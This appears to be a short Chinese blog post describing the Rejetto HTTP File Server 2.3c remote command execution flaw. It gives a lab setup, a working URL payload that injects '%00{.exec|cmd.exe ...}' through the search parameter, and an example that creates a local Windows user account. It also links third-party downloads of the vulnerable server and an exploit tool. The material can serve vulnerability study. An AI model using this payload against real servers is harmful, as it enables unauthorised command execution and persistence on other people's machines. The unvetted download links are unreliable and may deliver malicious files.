HFS漏洞

2022年03月08日 Guestbook

漏洞简介

1	HTTP File Server是一款专为个人用户所设计的HTTP文件服务器，它提供虚拟档案系统，支持新增、移除虚拟档案资料夹等。

漏洞概述

Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞，该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。

漏洞实验环境

1 2	Win7一台 HFS 2.3B 版本（下载地址：https://wwa.lanzoul.com/i5U2w017osja）

漏洞手工利用

攻击payload及过程：
Payload：http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c [Command-String].}
攻击过程实例：
http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c net user test1234 1234 /add.}
说明这个OK的前提是HFS以管理员权限运行：

漏洞软件利用和下载地址

1	下载地址：https://wwa.lanzoul.com/ij3bD017olrg

Original link: http://www.lovexue.cn/2022/03/08/HFS漏洞提权/

Copyright Notice: 转载请注明出处.